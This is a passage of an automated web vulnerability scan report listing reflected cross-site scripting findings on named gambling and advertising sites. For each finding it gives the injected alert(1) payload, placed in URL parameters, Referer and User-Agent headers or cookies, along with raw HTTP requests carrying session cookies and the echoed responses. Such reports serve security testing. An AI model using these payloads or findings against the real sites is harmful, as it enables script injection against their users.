3.74. http://www.primescratchcards.com/index.asp [curr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The value of the curr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35af5'%3balert(1)//d13433ff10e was submitted in the curr parameter. This input was echoed as 35af5';alert(1)//d13433ff10e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.asp?curr=USD35af5'%3balert(1)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29900
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD35af5';alert(1)//d13433ff10e&AR=130137&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no
...[SNIP]...

3.75. http://www.primescratchcards.com/index.asp [curr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The value of the curr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13cad"%3balert(1)//2102d64af9 was submitted in the curr parameter. This input was echoed as 13cad";alert(1)//2102d64af9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.asp?curr=USD13cad"%3balert(1)//2102d64af9&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29898
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
document.trucksys.submit();
   DownloadCount();
}


function doflashSidebar_ByLng()
{
var flashGettingStarted = new FlashObject("http://www.primescratchcards.com/images/sidebar_flash/ENG_USD13cad";alert(1)//2102d64af9.swf", "movie", "197", "134", "6", "");
flashGettingStarted.addParam("quality", "best");
flashGettingStarted.addParam("allowScriptAccess", "always");
flashGettingStarted.addParam("wmode", "tra
...[SNIP]...

3.76. http://ad.yieldmanager.com/imp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45128'-alert(1)-'006f93246b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=1703625&_salt=78423076&B=12&m=2&r=0 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=45128'-alert(1)-'006f93246b
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:34 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0243.rm.bf1
Set-Cookie: ih="b!!!!%!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui!2'V=!!!!#=!o!t"; path=/; expires=Wed, 15-May-2013 12:52:34 GMT
Set-Cookie: vuday1=JOU8[NDf0(/hP#[; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$(#H!#yJY!$fh[!2'V=!%hKg!!!!$!?5%!$Tey-!wVd.!'Hct!$gSu!'x'(~~~~~=!o!t=(*f'!!.vL"; path=/; expires=Wed, 15-May-2013 12:52:34 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=OrgU(-xY.<O0,nW; path=/; expires=Mon, 16-May-2011 13:52:34 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:34 GMT
Pragma: no-cache
Content-Length: 3662
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

//raw JavaScript
document.write('<scr'+'ipt>\nvar gEbBAd = new Object();\ngEbBAd.AClickUrl = "http://t.mookie1.com/t/v1/clk?migAgencyId=66&migSource=mmind&migTrackDataExt=[%tp_AdID%];[%tp_Placement
...[SNIP]...
asci_publiid = '1709175';
var asci_sectid = '1703625';
var asci_advliid = '3056520';
var asci_cid = '9245050';
var asci_p = '200';
var asci_refurl = escape('http://www.google.com/search?hl=en&q=45128'-alert(1)-'006f93246b');
if ( asci_refurl.length >
...[SNIP]...

3.77. https://www.interwetten.com/sportsbook/registrationform.aspx [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /sportsbook/registrationform.aspx

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa0eb"><script>alert(1)</script>69648c939d3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sportsbook/registrationform.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa0eb"><script>alert(1)</script>69648c939d3
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:45:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:46 GMT
Content-Length: 199712
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
wWindow = window.open('https://service.velaro.com/visitor/requestchat.aspx?showwhen=inqueue&secure=yes&Name:=&Email:=&siteid=7297&deptid=12265&Browser=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa0eb"><script>alert(1)</script>69648c939d3'+getFormValues(), 'OnlineChatSoftware', 'toolbar=no,location=no,directories=no,menubar=no,status=no,scrollbars=no,resizable=yes,replace=no');this.newWindow.focus();this.newWindow.opener=window;return
...[SNIP]...

3.78. http://home.okscratchcards.com/AboutUs.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c00d9"-alert(1)-"58ee19908e3 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMc00d9"-alert(1)-"58ee19908e3; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: BO=FMc00d9"-alert(1)-"58ee19908e3; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc00d9"-alert(1)-"58ee19908e3";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.79. http://home.okscratchcards.com/AboutUs.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcd02"-alert(1)-"7f6a71d7a39 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMdcd02"-alert(1)-"7f6a71d7a39; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMdcd02"-alert(1)-"7f6a71d7a39; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMdcd02"-alert(1)-"7f6a71d7a39";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.80. http://home.okscratchcards.com/ContactUsMail.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6100"-alert(1)-"98a251159eb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb6100"-alert(1)-"98a251159eb; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: BO=FMb6100"-alert(1)-"98a251159eb; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb6100"-alert(1)-"98a251159eb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.81. http://home.okscratchcards.com/ContactUsMail.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ced5"-alert(1)-"413d8871f9d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM8ced5"-alert(1)-"413d8871f9d; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8ced5"-alert(1)-"413d8871f9d; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8ced5"-alert(1)-"413d8871f9d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.82. http://home.okscratchcards.com/FairPlay.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5d81"-alert(1)-"17298092768 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMe5d81"-alert(1)-"17298092768; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: BO=FMe5d81"-alert(1)-"17298092768; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe5d81"-alert(1)-"17298092768";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.83. http://home.okscratchcards.com/FairPlay.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /FairPlay.aspx

Issue detail

